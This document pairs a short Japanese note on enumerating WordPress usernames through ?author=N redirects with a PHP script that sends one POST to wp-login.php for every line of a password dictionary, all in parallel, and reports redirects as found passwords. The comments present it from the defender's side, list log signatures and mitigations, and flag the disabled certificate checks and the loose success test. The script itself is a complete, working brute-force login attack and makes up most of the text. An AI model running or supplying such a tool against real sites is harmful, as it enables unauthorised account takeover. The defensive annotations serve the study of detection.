WordPressのURLに?author=1をつけてアクセスすると著者ページ(/author/ユーザ名)へリダイレクトされるため、ユーザID 1のユーザ名を取得できる
http://example.com/?author=1
http://example.com/author/admin
ログイン画面
http://example.com/wp-login.php
// Password-guessing demonstration against a WordPress login form, documented
// here from the defender's side.
//
// What the script does: for every non-empty line of the file named by
// DICTIONARY it builds one POST to TARGET_URL carrying the fields `log`
// (account name) and `pwd` (candidate password), runs all of those requests
// through a single curl_multi handle, and afterwards reports every request
// whose final URL is no longer TARGET_URL.
//
// What this looks like on the server: one POST to /wp-login.php per dictionary
// line, all with the same `log` value and the same User-Agent string, issued
// together with no delay between them. Throttling or lockout of repeated
// failed logins per account and per source address, multi-factor
// authentication, and not exposing usernames through ?author=N all reduce the
// exposure described on this page.

// Start time, used only for the elapsed-time message at the end.
$time = microtime(true);

// Login endpoint that receives every request.
const TARGET_URL = 'http://example.com/wp-login.php';
// Fixed User-Agent sent on every request; a constant value like this is a
// usable log-filtering key.
const USER_AGENT = 'Mozilla/5.0';
// Path of the candidate list, read with file() below (one candidate per line).
const DICTIONARY = 'password';
// Seconds; used for both the total and the connect timeout.
const TIMEOUT = 30;

// Account name submitted in the `log` field. It is the name that appears in
// the /author/admin URL shown earlier on the page.
$log = 'admin';
// Set to true as soon as any request is treated as a successful login.
$hit_flag = false;

try {
    $mh = curl_multi_init();
    // Candidate list: trailing newlines stripped, empty lines skipped.
    $pwds = file(DICTIONARY, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    // Temporary file whose path serves as the cookie store for every handle.
    $meta = stream_get_meta_data($fp = tmpfile());
    // One curl handle per candidate; $chs keeps them in the same order as
    // $pwds so the index can be mapped back to the candidate later.
    foreach($pwds as $pwd) {
        $ch = curl_init();
        $chs[] = $ch;
        curl_setopt_array($ch, [
            CURLOPT_URL => TARGET_URL,
            CURLOPT_POST => true,
            // URL-encoded form body: log=<account>&pwd=<candidate>.
            CURLOPT_POSTFIELDS => http_build_query(['log'=> $log, 'pwd' => $pwd]),
            // Certificate and host-name verification are both switched off,
            // so any certificate is accepted. Do not carry these two settings
            // over into production HTTP clients.
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            // Response bodies are not captured into a variable.
            CURLOPT_RETURNTRANSFER => false,
            // All handles read and write cookies through the same temp file.
            CURLOPT_COOKIEJAR => $meta['uri'],
            CURLOPT_COOKIEFILE => $meta['uri'],
            // Redirects are followed; the check after the transfer depends on
            // where the request finally ends up.
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_USERAGENT => USER_AGENT,
            CURLOPT_ENCODING => 'gzip',
            CURLOPT_TIMEOUT => TIMEOUT,
            CURLOPT_CONNECTTIMEOUT => TIMEOUT
        ]);
        curl_multi_add_handle($mh, $ch);
    }
    // Drive all transfers until none is still running. $active is the number
    // of running handles; CURLM_OK is 0, so the loop ends when it reaches 0.
    do {
        curl_multi_exec($mh, $active);
        curl_multi_select($mh);
    } while ($active > CURLM_OK);
    // A request counts as a hit when its effective URL differs from the login
    // URL, i.e. the server redirected it somewhere else.
    // NOTE(review): any redirect satisfies this test, not only the one issued
    // after a successful login; confirm before trusting a reported hit.
    foreach($chs as $idx => $ch) {
        if (curl_getinfo($ch, CURLINFO_EFFECTIVE_URL) !== TARGET_URL){
            $hit_flag = true;
            echo "The password is \"{$pwds[$idx]}\".\n";
        }
        curl_multi_remove_handle($mh, $ch);
        curl_close($ch);
    }
    curl_multi_close($mh);
} catch (exception $e) {
    // Prints the message of any exception thrown inside the try block.
    echo $e->getMessage();
}
// No request ended on a URL other than the login page.
if (!$hit_flag) echo "Did not hit.\n";
// Elapsed wall-clock time for the whole run.
$time = microtime(true) - $time;
echo "It took ${time} seconds.\n";